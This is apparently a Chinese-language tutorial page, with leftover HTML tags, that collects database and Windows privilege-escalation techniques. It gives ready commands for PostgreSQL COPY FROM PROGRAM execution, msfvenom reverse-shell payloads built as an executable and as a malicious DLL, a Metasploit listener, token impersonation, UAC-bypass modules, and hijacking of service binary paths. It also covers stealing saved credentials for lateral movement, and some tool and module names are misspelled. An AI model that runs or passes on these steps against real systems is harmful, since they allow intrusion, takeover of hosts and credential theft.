数据库与系统提权技术全面指南<\/h1>

一、数据库提权技术<\/h2>

1. 数据库提权流程概述<\/h3>
获取数据库用户密码途径：<\/p>
网站SQL注入漏洞<\/li>
数据库存储文件或备份文件<\/li>
网站应用源码中的数据库配置文件<\/li>
工具或脚本爆破(需解决外联问题)<\/li> <\/ul> <\/li>
连接数据库工具：<\/p>
MDUT (命令行工具)<\/li>
DatabaseTools (图形化工具)<\/li>
Navicat (商业数据库管理工具)<\/li> <\/ul> <\/li> <\/ol>
2. 各数据库提权技术详解<\/h3>

MySQL提权 (端口3306)<\/h4>
开启外联命令<\/strong>：<\/p>
GRANT<\/span> ALL<\/span> PRIVILEGES<\/span> ON<\/span> *<\/span>.*<\/span> TO<\/span> '账号'<\/span>@<\/span>'%'<\/span> IDENTIFIED BY<\/span> '密码'<\/span> WITH<\/span> GRANT<\/span> OPTION<\/span>;
<\/span><\/span>FLUSH PRIVILEGES<\/span>;
<\/span><\/span><\/code><\/pre>提权条件与技术<\/strong>：<\/p>

条件：ROOT密码且secure-file-priv<\/code>参数未严格限制<\/li>
技术：

UDF提权<\/li>
MOF启动项提权<\/li>
反弹shell<\/li>
<\/ul>
<\/li>
<\/ul>
secure-file-priv参数影响<\/strong>：<\/p>

NULL：完全禁用文件操作<\/li>
空字符串：无限制(最不安全)<\/li>
指定目录：只能在指定目录操作<\/li>
<\/ul>
SQL Server提权 (端口1433)<\/h4>
开启外联命令<\/strong>：<\/p>
EXEC<\/span> sp_configure 'show advanced options'<\/span>,1<\/span>;
<\/span><\/span>RECONFIGURE;
<\/span><\/span>EXEC<\/span> sp_configure 'Ad Hoc Distributed Queries'<\/span>,1<\/span>;
<\/span><\/span>RECONFIGURE;
<\/span><\/span><\/code><\/pre>提权条件与技术<\/strong>：<\/p>

条件：sa密码<\/li>
技术：

xp_cmdshell<\/li>
sp_oacreate<\/li>
CLR沙盒<\/li>
<\/ul>
<\/li>
<\/ul>
PostgreSQL提权 (端口5432)<\/h4>
提权命令<\/strong>：<\/p>
DROP<\/span> TABLE<\/span> IF<\/span> EXISTS<\/span> cmd_exec;
<\/span><\/span>CREATE<\/span> TABLE<\/span> cmd_exec(cmd_output test);
<\/span><\/span>COPY<\/span> cmd_exec FROM<\/span> PROGRAM 'id'<\/span>;
<\/span><\/span>SELECT<\/span> *<\/span> FROM<\/span> cmd_exec;
<\/span><\/span><\/code><\/pre>利用条件<\/strong>：<\/p>

版本9-12存在CVE-2019-9193漏洞<\/li>
<\/ul>
Redis提权 (端口6379)<\/h4>
提权技术<\/strong>：<\/p>

通过未授权访问<\/li>
写入SSH密钥<\/li>
计划任务执行<\/li>
反弹shell<\/li>
<\/ul>
安装命令<\/strong>：<\/p>
wget http:\/\/download.redis.io\/releases\/redis-2.8.17.tar.gz
<\/span><\/span>tar xzf redis-2.8.17.tar.gz
<\/span><\/span>cd redis-2.8.17
<\/span><\/span>make
<\/span><\/span>cd src\/
<\/span><\/span>redis-server
<\/span><\/span><\/code><\/pre>Memcache提权 (端口11211)<\/h4>
特点<\/strong>：<\/p>

常用key-value缓存系统<\/li>
默认无权限控制模块<\/li>
可直接读取敏感信息<\/li>
<\/ul>
操作命令<\/strong>：<\/p>
systemctl restart memcache  # 开启<\/span>
<\/span><\/span>systemctl stop memcache     # 关闭<\/span>
<\/span><\/span><\/code><\/pre>3. 代理技术在数据库提权中的应用<\/h3>
场景<\/strong>：<\/p>

攻击机：192.168.1.10<\/li>
A服务器：192.168.1.100(外网出口)\/192.168.2.100(内网入口)<\/li>
B服务器：192.168.2.200(内网MSSQL服务器)<\/li>
<\/ul>
解决方案<\/strong>：<\/p>

在A服务器上设置代理<\/li>
攻击机工具连接代理<\/li>
代理连接目标服务器<\/li>
实现本地化连接效果<\/li>
<\/ol>
二、第三方软件提权技术<\/h2>
1. 常见提权软件分类<\/h3>


远程控制软件<\/strong>：<\/p>

Teamviewer<\/li>
向日葵<\/li>
ToDesk<\/li>
VPC<\/li>
Radmin<\/li>
<\/ul>
<\/li>

密码管理软件<\/strong>：<\/p>

浏览器密码存储<\/li>
Xshell<\/li>
Navicat<\/li>
<\/ul>
<\/li>

服务类软件<\/strong>：<\/p>

FileZilla<\/li>
Serv-u<\/li>
Zend<\/li>
<\/ul>
<\/li>

文档类软件<\/strong>：<\/p>

WinRAR (CVE漏洞)<\/li>
WPS Office<\/li>
<\/ul>
<\/li>
<\/ol>
2. 典型提权案例<\/h3>


Teamviewer提权<\/strong>：<\/p>

计算机用户权限 → 系统权限<\/li>
<\/ul>
<\/li>

Navicat Premium提权<\/strong>：<\/p>

使用taotie插件从普通用户提权至administrator<\/li>
<\/ul>
<\/li>

WinRAR提权<\/strong>：<\/p>

利用CVE-2023-38831漏洞<\/li>
<\/ul>
<\/li>

浏览器密码凭据提权<\/strong>：<\/p>

获取保存的密码进行横向移动<\/li>
<\/ul>
<\/li>
<\/ol>
三、Windows系统提权技术<\/h2>
1. 服务启动提权<\/h3>
SC服务启动<\/h4>
sc Create syscmd binPath= "c:\msf.exe"<\/span>
<\/span><\/span>sc start syscmd
<\/span><\/span><\/code><\/pre>PsExec服务启动<\/h4>
psexec.exe -accepteula -s -i -d cmd
<\/span><\/span><\/code><\/pre>2. 进程注入技术<\/h3>
MSF操作流程<\/strong>：<\/p>

生成payload：
msfvenom -p windows\/x64\/meterpreter\/reverse_tcp LHOST=<\/span>IP LPORT=<\/span>4444<\/span> -f exe -o msf64.exe
<\/span><\/span><\/code><\/pre><\/li>
监听设置：
use exploit\/multi\/handler
<\/span><\/span>set payload windows\/x64\/meterpreter\/reverse_tcp
<\/span><\/span>set lhost IP
<\/span><\/span>set lport 4444<\/span>
<\/span><\/span>exploit
<\/span><\/span><\/code><\/pre><\/li>
进程迁移：
ps
<\/span><\/span>migrate PID
<\/span><\/span>getsystem
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
CS操作流程<\/strong>：<\/p>

查看进程列表<\/li>
选择目标进程注入<\/li>
使用getsystem<\/code>提权<\/li>
<\/ol>
3. 令牌窃取技术<\/h3>
MSF操作<\/strong>：<\/p>
use incognito
<\/span><\/span>list_tokens -u
<\/span><\/span>impersonate_token "NT AUTHORITY\SYSTEM"<\/span>
<\/span><\/span><\/code><\/pre>CS操作<\/strong>：<\/p>

stral_token PID<\/code>：直接窃取令牌<\/li>
spawnu PID<\/code>：生成新进程窃取令牌<\/li>
<\/ul>
4. UAC绕过技术<\/h3>
MSF模块<\/strong>：<\/p>
use exploit\/windows\/local\/ask       # 钓鱼式<\/span>
<\/span><\/span>use exploit\/windows\/local\/bypassua  # Win7<\/span>
<\/span><\/span>use exploit\/windows\/local\/bypassuac_sluihijack    # Win10\/11<\/span>
<\/span><\/span>use exploit\/windows\/local\/bypassuac_slienrcleanup # Win10\/11<\/span>
<\/span><\/span><\/code><\/pre>UACME工具<\/strong>：<\/p>
Akagi64.exe 编号 执行文件
<\/span><\/span>Akagi64.exe 41 msf.exe
<\/span><\/span><\/code><\/pre>5. DLL劫持技术<\/h3>
实施步骤<\/strong>：<\/p>

信息收集：查找目标应用程序<\/li>
进程调试：分析调用的DLL

工具：火绒剑HRSword、ChkDllHijack<\/li>
<\/ul>
<\/li>
制作恶意DLL：
msfvenom -p windows\/x64\/meterpreter\/reverse_tcp LHOST=<\/span>IP LPORT=<\/span>4444<\/span> -f dll -o x.dll
<\/span><\/span><\/code><\/pre><\/li>
替换原始DLL<\/li>
等待应用程序执行<\/li>
<\/ol>
DLL搜索顺序<\/strong>：<\/p>

应用程序加载目录<\/li>
C:\Windows\System32<\/li>
C:\Windows\System<\/li>
C:\Windows<\/li>
当前工作目录<\/li>
PATH环境变量目录<\/li>
<\/ol>
6. 不带引号服务路径提权<\/h3>
检测命令<\/strong>：<\/p>
wmic service get name,displayname,pathname,startmode |findstr \/i "Auto"<\/span> |findstr \/i \/v "C:\Windows\\"<\/span> |findstr \/i \/v """<\/span>
<\/span><\/span><\/code><\/pre>利用方法<\/strong>：<\/p>

查找不带引号的服务路径<\/li>
在空格前的路径位置上传恶意可执行文件<\/li>
等待服务启动执行<\/li>
<\/ol>
7. 不安全的服务权限提权<\/h3>
检测命令<\/strong>：<\/p>
accesschk.exe -uwcqv "用户名"<\/span> *
<\/span><\/span><\/code><\/pre>修改服务路径<\/strong>：<\/p>
sc config "服务名"<\/span> binpath="恶意路径"<\/span>
<\/span><\/span>sc start 服务名
<\/span><\/span><\/code><\/pre>四、综合检测工具<\/h2>
WinPEAS工具<\/strong>：<\/p>
winPEAS.bat > result.txt
<\/span><\/span>winPEASant.exe log=result.txt
<\/span><\/span><\/code><\/pre>五、内网域概念与提权意义<\/h2>


为什么需要提权<\/strong>：<\/p>

Administrator无法与域通信<\/li>
System权限可以挣脱域控管理<\/li>
获取域用户信息：
net user \/domain
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
<\/li>

为什么需要降权<\/strong>：<\/p>

某些漏洞攻击需要低权限<\/li>
高权限可能无法触发特定漏洞<\/li>
实现与域内机器通信<\/li>
<\/ul>
<\/li>

域环境通讯原理<\/strong>：<\/p>

域控管理通讯<\/li>
System权限不受本地管理限制<\/li>
普通用户权限受域控管理限制<\/li>
<\/ul>
<\/li>
<\/ol>
六、实战注意事项<\/h2>


数据库提权<\/strong>：<\/p>

注意secure-file-priv<\/code>参数限制<\/li>
优先尝试开启外联<\/li>
不同数据库使用专用提权技术<\/li>
<\/ul>
<\/li>

系统提权<\/strong>：<\/p>

根据系统版本选择合适方法<\/li>
注意权限继承关系<\/li>
多尝试不同提权路径<\/li>
<\/ul>
<\/li>

工具使用<\/strong>：<\/p>

MSF与CS各有优势<\/li>
善用UACME等综合工具<\/li>
自动化检测工具辅助<\/li>
<\/ul>
<\/li>
<\/ol>
本指南涵盖了从数据库到系统层面的各类提权技术，包括原理、实施步骤和实战技巧。在实际应用中，需要根据目标环境灵活选择合适的方法，并注意权限的继承与转换关系。<\/p>